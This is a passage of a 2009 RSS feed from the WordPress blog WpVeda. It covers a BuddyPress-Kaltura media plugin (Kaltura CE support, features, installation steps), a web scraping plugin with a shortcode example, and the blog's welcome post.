This is a quick post to announce small but significant update to our BuddyPress Media Plugin which makes use of Kaltura open-source media platform.
By default, BuddyPress Media plugin uses Kaltura&#8217;s server to store all user upload media files. Some BuddyPress social network owners didn&#8217;t like this for various reasons and they wanted to use this [...]<p><a href="http://wpveda.com/support-for-kaltura-ce-is-added-to-buddypress-media-plugin/">Support for Kaltura CE is added to BuddyPress Media Plugin</a> is a post from: <a href="http://wpveda.com">WpVeda</a></p>



Related posts:<ol<br/><h3>Related posts:</h3><ul><li><a href='http://wpveda.com/buddypress-kaltura-media-component-for-buddypress-version-1-1/' rel='bookmark' title='Permanent Link: BuddyPress Kaltura Media Component for BuddyPress version 1.1'>BuddyPress Kaltura Media Component for BuddyPress version 1.1</a></li>
<li><a href='http://wpveda.com/buddypress-kaltura-media-component/' rel='bookmark' title='Permanent Link: BuddyPress-Kaltura Media Component'>BuddyPress-Kaltura Media Component</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<div class="tweetmeme_button" style="float: right; margin-left: 10px;">
			<a href="http://api.tweetmeme.com/share?url=http%3A%2F%2Fwpveda.com%2Fsupport-for-kaltura-ce-is-added-to-buddypress-media-plugin%2F"><br />
				<img src="http://api.tweetmeme.com/imagebutton.gif?url=?url=http%3A%2F%2Fwpveda.com%2Fsupport-for-kaltura-ce-is-added-to-buddypress-media-plugin%2F&amp;style=normal" height="61" width="51" /><br />
			</a>
		</div>
<p><a href="http://rtcamp.com/web/wp-content/uploads/2009/10/kaltura-open-source-video-community-logo.jpg"><img src="http://rtcamp.com/web/wp-content/uploads/2009/10/kaltura-open-source-video-community-logo.jpg" alt="kaltura-open-source-video-community-logo" width="221" height="94" /></a><a href="http://rtcamp.com/web/wp-content/uploads/2009/10/budypress_logo.gif"><img src="http://rtcamp.com/web/wp-content/uploads/2009/10/budypress_logo.gif" alt="budypress_logo" width="216" height="90" /></a></p>
<p>This is a quick post to announce small but significant update to our <a href="http://www.wpveda.com/buddypress-kaltura-media-component/">BuddyPress Media Plugin</a> which makes use of Kaltura open-source media platform.</p>
<p>By default, BuddyPress Media plugin uses Kaltura&#8217;s server to store all user upload media files. Some BuddyPress social network owners didn&#8217;t like this for various reasons and they wanted to use this media component with <a href="http://www.kaltura.org/project/kalturaCE">Kaltura CE &#8211; Kaltura&#8217;s self-hosted open-source media platform</a>.</p>
<p>In a small release, which also happens to be <a href="http://wordpress.org/extend/plugins/buddypress-kaltura-media-component/">first release on wordpress&#8217;s official plugin repo</a>, we made necessary changes so that this BuddyPress component can work with Kaltura.com as well Kaltura CE out of the box.</p>
<h3>What is Kaltura CE?</h3>
<p>In simple words Kaltura CE is like wordpress.org &#8211; <em>you can download and install <strong>it</strong> on your own server</em> as compared to Kaltura.com which is more like wordpress.com &#8211; <em>you can use <strong>it</strong> on someone else server with few limitations</em>.</p>
<p><strong>Kaltura CE over Kaltura.com has following main advantage:</strong></p>
<ul>
<li>With Kaltura CE all data (codes &amp; media) is uploaded to our server</li>
<li>Kaltura.com offers limited storage and transfer in <a href="http://corp.kaltura.com/about/signup">free account</a></li>
<li>As running Wordpress-MU and BuddyPress requires a good webhost, you may be already having a server to run Kaltura CE. So Kaltura CE will increase your cost, may not be true in early days of your social-network.</li>
</ul>
<p>Only downside is that installing Kaltura CE requires some extra technical knowledge and no webhost provides one-click type of installer as provided for Wordpress, Joomla, etc. But setting up your own Kaltura CE server is one-time exercise and you can do it on your own by following official documentation or <a href="http://rtcamp.com/contact/">hire us</a> to get it done for you.</p>
<p><strong>Links:</strong> <a href="http://www.wpveda.com/buddypress-kaltura-media-component/">BuddyPress Media Component</a> (<a href="http://wordpress.org/extend/plugins/buddypress-kaltura-media-component/">on wordpress.org</a>) | <a href="http://www.kaltura.org/project/kalturaCE">Kaltura CE</a></p>
<p><strong>Recommended Webhost for Kaltura CE: </strong><a href="http://www.mediatemple.net/go/order/?refdom=rtcamp.com">Mediatemple</a></p>
<p><a href="http://wpveda.com/support-for-kaltura-ce-is-added-to-buddypress-media-plugin/">Support for Kaltura CE is added to BuddyPress Media Plugin</a> is a post from: <a href="http://wpveda.com">WpVeda</a></p>


<p>Related posts:<ol<br/><h3>Related posts:</h3><ul><li><a href='http://wpveda.com/buddypress-kaltura-media-component-for-buddypress-version-1-1/' rel='bookmark' title='Permanent Link: BuddyPress Kaltura Media Component for BuddyPress version 1.1'>BuddyPress Kaltura Media Component for BuddyPress version 1.1</a></li>
<li><a href='http://wpveda.com/buddypress-kaltura-media-component/' rel='bookmark' title='Permanent Link: BuddyPress-Kaltura Media Component'>BuddyPress-Kaltura Media Component</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://wpveda.com/support-for-kaltura-ce-is-added-to-buddypress-media-plugin/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Web Scraping in WordPress</title>
		<link>http://wpveda.com/web-scraping-in-wordpress/</link>
		<comments>http://wpveda.com/web-scraping-in-wordpress/#comments</comments>
		<pubDate>Wed, 04 Nov 2009 13:48:11 +0000</pubDate>
		<dc:creator>Akshay</dc:creator>
				<category><![CDATA[Plugins]]></category>
		<category><![CDATA[Wordpress]]></category>
		<category><![CDATA[Wordpress MU]]></category>
		<category><![CDATA[curl]]></category>
		<category><![CDATA[webscraping]]></category>
		<category><![CDATA[wp-web-scraper]]></category>

		<guid isPermaLink="false">http://www.wpveda.com/?p=27</guid>
		<description><![CDATA[WP Web Scraper is an easy to implement professional web scraper for WordPress. It can be used to display realtime data from any websites directly into your posts, pages or sidebar. This plugin can be used to include realtime stock quotes, cricket or soccer scores or any other generic content.<p><a href="http://wpveda.com/web-scraping-in-wordpress/">Web Scraping in WordPress</a> is a post from: <a href="http://wpveda.com">WpVeda</a></p>



No related posts.]]></description>
			<content:encoded><![CDATA[<div class="tweetmeme_button" style="float: right; margin-left: 10px;">
			<a href="http://api.tweetmeme.com/share?url=http%3A%2F%2Fwpveda.com%2Fweb-scraping-in-wordpress%2F"><br />
				<img src="http://api.tweetmeme.com/imagebutton.gif?url=?url=http%3A%2F%2Fwpveda.com%2Fweb-scraping-in-wordpress%2F&amp;style=normal" height="61" width="51" /><br />
			</a>
		</div>
<p>I had been waiting for WpVeda to be launched since my first chat with Rahul some months back. Its always great to see conscious efforts from team rtCamp to give it back to the community. Congrats Rahul, and thanks for my mention in your <a href="http://www.wpveda.com/welcome-to-wpveda/">first post</a>.</p>
<p><img class="size-full wp-image-39 alignright" src="http://www.wpveda.com/files/2009/11/wordpress_icon.png" alt="wordpress_icon" width="135" height="135" /></p>
<p>I too strongly advocate open source and community contributions in general and I myself have also published <a href="http://wordpress.org/extend/plugins/profile/akshay_raje" target="_blank">some plugins</a>.</p>
<p>Today I am writing about one of my plugins which caters to a very specific niche but surely has a good user base from the audience it caters to. The niche task which this plugin performs is web scraping.</p>
<h2>What is Web Scraping?</h2>
<p>Web scraping (or Web harvesting, Web data extraction) is a computer software technique of extracting information from websites. Web scraping focuses more on the transformation of unstructured Web content, typically in HTML format, into structured data that can be formatted and displayed or stored and analyzed. Web scraping is also related to Web automation, which simulates human Web browsing using computer software. Exemplary uses of Web scraping include online price comparison, weather data monitoring, market data tracking, web content mashup and web data integration.</p>
<h2>WP Web Scraper</h2>
<p><a href="http://wordpress.org/extend/plugins/wp-web-scrapper/" target="_blank">WP Web Scraper</a> is an easy to implement professional web scraper for WordPress. It can be used to display real-time data from any websites directly into your posts, pages or sidebar. This plugin can be used to include real-time stock quotes, cricket or soccer scores or any other generic content. The scraper is built using time tested cURL library for scraping and phpQuery for parsing and outputting HTML.<br />
It also has some advanced configuration features such as:</p>
<ol>
<li>Configurable caching of scraped data. Cache timeout in minutes can be defined in minutes for every scrap.</li>
<li>Custom Useragent header for your scraper can be set for every scrap.</li>
<li>Scrap output can be displayed through custom template tag, shortcode in page, post and sidebar (text widget).</li>
<li>Error handling &#8211; Silent fail, standard error, custom error message or display expired cache.</li>
<li>Option to clear or replace a certain regex pattern from the scrap before output.</li>
<li>Option to strip off a single or multiple HTML tags from the output.</li>
<li>Supports html charset conversion between various charsets.</li>
</ol>
<p>Am sure, this all sounds a bit geekish to someone who has not explored web scraping before.</p>
<p>For a better perspective, what could be a better example of displaying the download count of my plugin from wordpress.org. To do this, all I need to do (assuming that the plugin is installed) is to insert the following shortcode in my page, post or the text widget of sidebar:<br />
<strong>[wpws url = "http://wordpress.org/extend/plugins/wp-web-scrapper/stats/"  selector=".last-child td" cache="60" timeout="3" error="cache"]</strong></p>
<h2>Using Shortcode</h2>
<p>Now lets decrypt the shortcode. The first parameter &#8211; url, specifies the url from which you intend to scrap data. The second (and perhaps the most important) parameter &#8211; selector, specifies the exact location in that url where your data is located. The syntax used is of good old CSS. If you have worked with CSS or jQuery before, it should be very easy for you to write a CSS selector.</p>
<p>In brief, the selector mentioned above refers to the first td element which is a child of the first element with the class &#8216;last-child&#8217;. You can easily build such selectors by viewing the source code of your url. Rest of the parameters are optional. Cache specifies the time in minutes it will cache data instead of fetching data on each request, timeout is the maximum time in seconds the scraper will spend on the task and error denotes what happens in case the scraper fails (if cache is the value for error, it will display expired cache data in case of an error).</p>
<p>I hope this gets you interested enough to start exploring its limit less possibilities. <a href="http://wordpress.org/extend/plugins/wp-web-scrapper/" target="_blank">Download your copy</a>, install it and get started. You can find more info on this plugin in the <a href="http://wordpress.org/extend/plugins/wp-web-scrapper/faq/" target="_blank">FAQ</a> section or its <a href="http://webdlabs.com/projects/wp-web-scraper/" target="_blank">official page</a>.</p>
<p>Please note that the content you scraping might be copyright protected. Its best to at least attribute the content owner by a linkback or better take a written permission. Apart from rights, cURLing in general is a very resource intensive task. It will exhaust the bandwidth of your host as well as the host of of the content owner. Best is not to overdo it.</p>
<p><a href="http://wpveda.com/web-scraping-in-wordpress/">Web Scraping in WordPress</a> is a post from: <a href="http://wpveda.com">WpVeda</a></p>


<p>No related posts.</p>]]></content:encoded>
			<wfw:commentRss>http://wpveda.com/web-scraping-in-wordpress/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>BuddyPress-Kaltura Media Component</title>
		<link>http://wpveda.com/buddypress-kaltura-media-component/</link>
		<comments>http://wpveda.com/buddypress-kaltura-media-component/#comments</comments>
		<pubDate>Tue, 03 Nov 2009 07:47:28 +0000</pubDate>
		<dc:creator>Rahul Bansal</dc:creator>
				<category><![CDATA[BuddyPress]]></category>
		<category><![CDATA[Plugins]]></category>
		<category><![CDATA[Audio]]></category>
		<category><![CDATA[Component]]></category>
		<category><![CDATA[Kaltura]]></category>
		<category><![CDATA[Media]]></category>
		<category><![CDATA[Photos]]></category>
		<category><![CDATA[Social Network]]></category>
		<category><![CDATA[Video]]></category>

		<guid isPermaLink="false">http://www.wpveda.com/?p=18</guid>
		<description><![CDATA[
			
				
			
		

This BuddyPress component integrates Kaltura open-source video platform seamlessly. This component adds missing media rich features like photos, videos and audios uploading to BuddyPress which are essential if you are building social network, seriously!
Features:
As of now in first release of this plugin following features are supported. (please see screenshots section for visuals)

Buddypress user gets a [...]<p><a href="http://wpveda.com/buddypress-kaltura-media-component/">BuddyPress-Kaltura Media Component</a> is a post from: <a href="http://wpveda.com">WpVeda</a></p>



Related posts:<ol<br/><h3>Related posts:</h3><ul><li><a href='http://wpveda.com/buddypress-kaltura-media-component-for-buddypress-version-1-1/' rel='bookmark' title='Permanent Link: BuddyPress Kaltura Media Component for BuddyPress version 1.1'>BuddyPress Kaltura Media Component for BuddyPress version 1.1</a></li>
<li><a href='http://wpveda.com/support-for-kaltura-ce-is-added-to-buddypress-media-plugin/' rel='bookmark' title='Permanent Link: Support for Kaltura CE is added to BuddyPress Media Plugin'>Support for Kaltura CE is added to BuddyPress Media Plugin</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<div class="tweetmeme_button" style="float: right; margin-left: 10px;">
			<a href="http://api.tweetmeme.com/share?url=http%3A%2F%2Fwpveda.com%2Fbuddypress-kaltura-media-component%2F"><br />
				<img src="http://api.tweetmeme.com/imagebutton.gif?url=?url=http%3A%2F%2Fwpveda.com%2Fbuddypress-kaltura-media-component%2F&amp;style=normal" height="61" width="51" /><br />
			</a>
		</div>
<p><a href="http://rtcamp.com/web/wp-content/uploads/2009/10/kaltura-open-source-video-community-logo.jpg"><img src="http://rtcamp.com/web/wp-content/uploads/2009/10/kaltura-open-source-video-community-logo.jpg" alt="kaltura-open-source-video-community-logo" width="221" height="94" /></a><a href="http://rtcamp.com/web/wp-content/uploads/2009/10/budypress_logo.gif"><img src="http://rtcamp.com/web/wp-content/uploads/2009/10/budypress_logo.gif" alt="budypress_logo" width="216" height="90" /></a></p>
<p>This BuddyPress component integrates Kaltura open-source video platform seamlessly. This component adds missing media rich features like photos, videos and audios uploading to BuddyPress which are essential if you are building social network, seriously!</p>
<h3>Features:</h3>
<p>As of now in first release of this plugin following features are supported. <em>(please see <a href="#SCREENSHOTS">screenshots</a> section for visuals)</em></p>
<ol>
<li>Buddypress user gets a media menu.</li>
<li>They can upload video, images and audio files seamlessly to their profiles. (Data will be stored on the Kaltura server by default. You can use your own server as an alternative.)</li>
<li>All kaltura-data uploaded by a user will be visible to other users.</li>
<li>Data will be organized into video, images and audio automatically.</li>
<li>Buddypress users wont need separate Kaltura account to use media-rich features added by this component.</li>
<li>Only Buddypress (Wordpess MU) admin need Kaltura partner ID. All user data will be associate with admin&#8217;s kaltura partner account.</li>
<li>A local database at buddypress installation keeps track of which user is uploading which files, which further deals with data-separation on per member basis.</li>
<li>Widget support for recently added pictures/videos (only available for BuddyPress 1.1.x)</li>
</ol>
<h3>Requirements:</h3>
<ul>
<li>WordPress MU 2.8.4a</li>
<li>Buddypress 1.0.x OR Buddypress 1.1.x</li>
</ul>
<h3><strong>Download:</strong> <a href="http://wordpress.org/extend/plugins/buddypress-kaltura-media-component/">Download  Code</a> | <a href="http://rtcamp.com/web/wp-content/uploads/2009/10/buddypress-kaltura-media-component.pdf">Documentation in PDF</a> | <a href="http://rtcamp.net/wordpress-mu/members/admin/media">Live Demo</a></h3>
<h3>Installation:</h3>
<p>Installation of the component is same as other buddypress components.</p>
<ol>
<li>Download <a href="http://wordpress.org/extend/plugins/buddypress-kaltura-media-component/">component source code</a> and unzip it.</li>
<li>Upload <strong>&#8220;rt-bp-kaltura-plugin&#8221;</strong> directory into WordPress plugins directory i.e. <strong>&#8220;wp-content/plugins&#8221;</strong>.</li>
<li>Upload <strong>&#8220;rt-bp-kaltura-theme&#8221;</strong> directory into <strong>&#8220;wp-content/bp-themes/bp-members&#8221; </strong>directory.<em> </em><strong>&#8220;</strong><strong>bp-members&#8221;</strong> is the default BuddyPress members theme. If you are using your own customized theme substitute its folder name in-place of <strong>&#8220;bp-members&#8221; </strong>in path.<strong><br />
</strong></li>
<li>Go to<em><strong> Dashboard &gt;&gt; Plugins </strong></em>menu and activate <strong>&#8220;Buddypress-Kaltura Media Component&#8221;</strong></li>
<li>Go to <em><strong>Dashboard &gt;&gt; Settings &gt;&gt; Kaltura 	Settings </strong></em>and 	enter your Kaltura account settings there.</li>
</ol>
<h3>To-Do List:</h3>
<p>Below is list of features you will see in upcoming versions. If you need any specific feature, please use comment form below. We will try our best to add it to our list. If you need paid support or paid customizations, <a href="http://rtcamp.com/contact/">contact us</a>.</p>
<ol>
<li><strong>Privacy Controls &#8211; </strong>All uploaded data is be viewable by all users. There is privacy control supported in this version.<strong> </strong></li>
<li><strong>Album support -</strong> All photos as of now goes into single, global album.</li>
<li><strong>Commenting -</strong> As of now you can not comment directly on a users&#8217; media content.</li>
<li><strong>Caching Support -</strong> Even though we find Kaltura platform very robust and reliable, it wont hurt have local (buddypress server-side cache). After all what the use of those attractive &#8220;unlimited webhosting plans&#8221;! <img src='http://wpveda.com/wp-includes/images/smilies/icon_wink.gif' alt=';-)' class='wp-smiley' /> </li>
</ol>
<h3>Support this component</h3>
<p>If you find this component useful, please consider making a donation. Even this plugin is developed by a startup company, we need your support to release future updates in less time.<br />
<a href="https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&amp;hosted_button_id=9488824"><img src="https://www.paypal.com/en_US/i/btn/btn_donateCC_LG.gif" border="0" alt="" /></a></p>
<h3>Screenshots:</h3>
<p><a name="SCREENSHOTS"></a></p>
<p><a href="http://www.wpveda.com/files/2009/11/Kaltura-Settings-Kaltura-CE-Support.jpg"><img class="size-large wp-image-50 alignnone" src="http://www.wpveda.com/files/2009/11/Kaltura-Settings-Kaltura-CE-Support-590x358.jpg" alt="Kaltura Settings &amp; Kaltura CE Support" width="590" height="358" /></a><br />
<a href="http://rtcamp.com/web/wp-content/uploads/2009/10/Uploading-Photos-Videos-and-Audio-BuddyPress-Kaltura.png"><img class="alignnone size-medium wp-image-453" src="http://rtcamp.com/web/wp-content/uploads/2009/10/Uploading-Photos-Videos-and-Audio-BuddyPress-Kaltura-600x389.png" alt="Uploading Photos, Videos and Audio | BuddyPress Kaltura" width="600" height="389" /></a><br />
<a href="http://rtcamp.com/web/wp-content/uploads/2009/10/Photo-Gallery-BuddyPress-Kaltura.png"><img class="alignnone size-medium wp-image-452" src="http://rtcamp.com/web/wp-content/uploads/2009/10/Photo-Gallery-BuddyPress-Kaltura-600x399.png" alt="Photo Gallery | BuddyPress Kaltura" width="600" height="399" /></a></p>
<p><a href="http://rtcamp.com/web/wp-content/uploads/2009/10/Friends-Media-Page-BuddyPress-Kaltura.png"><img class="alignnone size-medium wp-image-450" src="http://rtcamp.com/web/wp-content/uploads/2009/10/Friends-Media-Page-BuddyPress-Kaltura-600x329.png" alt="Friends Media Page | BuddyPress Kaltura" width="600" height="329" /></a><br />
<a href="http://rtcamp.com/web/wp-content/uploads/2009/10/Video-Viewing-BuddyPress-Kaltura.png"><img class="alignnone size-medium wp-image-454" src="http://rtcamp.com/web/wp-content/uploads/2009/10/Video-Viewing-BuddyPress-Kaltura-600x332.png" alt="Video Viewing | BuddyPress Kaltura" width="600" height="332" /></a></p>
<h3><strong>Download:</strong> <a href="http://wordpress.org/extend/plugins/buddypress-kaltura-media-component/">Download  Code</a> | <a href="http://rtcamp.com/web/wp-content/uploads/2009/10/buddypress-kaltura-media-component.pdf">Documentation in PDF</a> | <a href="http://rtcamp.net/wordpress-mu/members/admin/media">Live Demo</a></h3>
<p><strong><em>Developed by:</em></strong><em> </em><a href="http://rtcamp.com/"><em>Kapil Gonge (rtCamp)</em></a></p>
<p><a href="http://wpveda.com/buddypress-kaltura-media-component/">BuddyPress-Kaltura Media Component</a> is a post from: <a href="http://wpveda.com">WpVeda</a></p>


<p>Related posts:<ol<br/><h3>Related posts:</h3><ul><li><a href='http://wpveda.com/buddypress-kaltura-media-component-for-buddypress-version-1-1/' rel='bookmark' title='Permanent Link: BuddyPress Kaltura Media Component for BuddyPress version 1.1'>BuddyPress Kaltura Media Component for BuddyPress version 1.1</a></li>
<li><a href='http://wpveda.com/support-for-kaltura-ce-is-added-to-buddypress-media-plugin/' rel='bookmark' title='Permanent Link: Support for Kaltura CE is added to BuddyPress Media Plugin'>Support for Kaltura CE is added to BuddyPress Media Plugin</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://wpveda.com/buddypress-kaltura-media-component/feed/</wfw:commentRss>
		<slash:comments>64</slash:comments>
		</item>
		<item>
		<title>Welcome To WpVeda!</title>
		<link>http://wpveda.com/welcome-to-wpveda/</link>
		<comments>http://wpveda.com/welcome-to-wpveda/#comments</comments>
		<pubDate>Mon, 02 Nov 2009 19:06:10 +0000</pubDate>
		<dc:creator>Rahul Bansal</dc:creator>
				<category><![CDATA[Editorial]]></category>

		<guid isPermaLink="false">http://www.wpveda.com/?p=4</guid>
		<description><![CDATA[
			
				
			
		
Welcome To WpVeda &#8211; another blog in rtBlogs Network!  
This blog is dedicated to wordpress and everything related to wordpress &#8211; the blogging platform which changed course of our lives forever. You can read more about this blog here.
Whats the big deal about this new blog on Wordpress!
As part of our client projects and [...]<p><a href="http://wpveda.com/welcome-to-wpveda/">Welcome To WpVeda!</a> is a post from: <a href="http://wpveda.com">WpVeda</a></p>



No related posts.]]></description>
			<content:encoded><![CDATA[<div class="tweetmeme_button" style="float: right; margin-left: 10px;">
			<a href="http://api.tweetmeme.com/share?url=http%3A%2F%2Fwpveda.com%2Fwelcome-to-wpveda%2F"><br />
				<img src="http://api.tweetmeme.com/imagebutton.gif?url=?url=http%3A%2F%2Fwpveda.com%2Fwelcome-to-wpveda%2F&amp;style=normal" height="61" width="51" /><br />
			</a>
		</div>
<p><img class="alignright size-full wp-image-13" src="http://www.wpveda.com/files/2009/11/wpveda-logo.gif" alt="wpveda-logo" width="212" height="64" />Welcome To WpVeda &#8211; another blog in <a href="http://rtblogs.com/blog-list/">rtBlogs Network</a>! <img src='http://wpveda.com/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' /> </p>
<p>This blog is dedicated to wordpress and everything related to wordpress &#8211; the blogging platform which changed course of our lives forever. You can <a href="http://www.wpveda.com/about/">read more about this blog here</a>.</p>
<h3>Whats the big deal about this new blog on Wordpress!</h3>
<p>As part of our client projects and our addiction for open-source technology, we at rtCamp develop lots of wordpress themes, plugins and hacks everyday.</p>
<p>Through WpVeda we will share our free and GPL based work with community from which we took a lot. We already have more than 6 wordpress/mu/buddypress plugins and bunch of free wordpress themes lined up for release. So you can expect a lot of good and free stuff on WpVeda in coming weeks.</p>
<p>You can also get free help from wordpress professionals who will be writing for this blog.</p>
<h3>Community Blogging &amp; Revenue Sharing&#8230;</h3>
<p>Like other blogs in our network, this blog is already Google Adsense revenue sharing enabled one. If you already have an account at Devils Workshop or at any other blog in our network, please proceed to dashboard and start posting. You will need to <a href="http://www.wpveda.com/wp-admin/index.php?page=rtrs_author_options">configure AdSense separately for WpVeda</a> and for almost every blog in our network since each blog has unique designs which affect Adsense ad-slot settings heavily.</p>
<p>If you haven&#8217;t joined our blog network yet, you can do so by registering here. Its free &amp; quick!</p>
<h3>Credits&#8230;</h3>
<p>WpVeda logo was designed by <a href="http://www.dnyanesh.com/">Dnyanesh Mankar</a> as part of <a href="http://www.devilsworkshop.org/results-winners-of-dws-3rd-anniversary-contest/">logo-design contest organized on Devils Workshop</a>. WpVeda theme is designed by our designer Rohit Maloo, who was referred to rtCamp by <a href="http://webdlabs.com/">Akshay Raje</a>. If you are looking for <a href="http://rtcamp.com/careers/">full-time wordpress jobs</a>, you can <a href="http://rtcamp.com/careers/">check this</a>!</p>
<p>Do let us know your feedback and suggestions. We will try our best to serve everything you want on wordpress here! <img src='http://wpveda.com/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' /> </p>
<p><a href="http://wpveda.com/welcome-to-wpveda/">Welcome To WpVeda!</a> is a post from: <a href="http://wpveda.com">WpVeda</a></p>


<p>No related posts.</p>]]></content:encoded>
			<wfw:commentRss>http://wpveda.com/welcome-to-wpveda/feed/</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
	</channel>
</rss><!-- Dynamic page generated in 0.518 seconds. --><!-- Cached page generated by WP-Super-Cache on 2010-02-25 19:53:47 -->
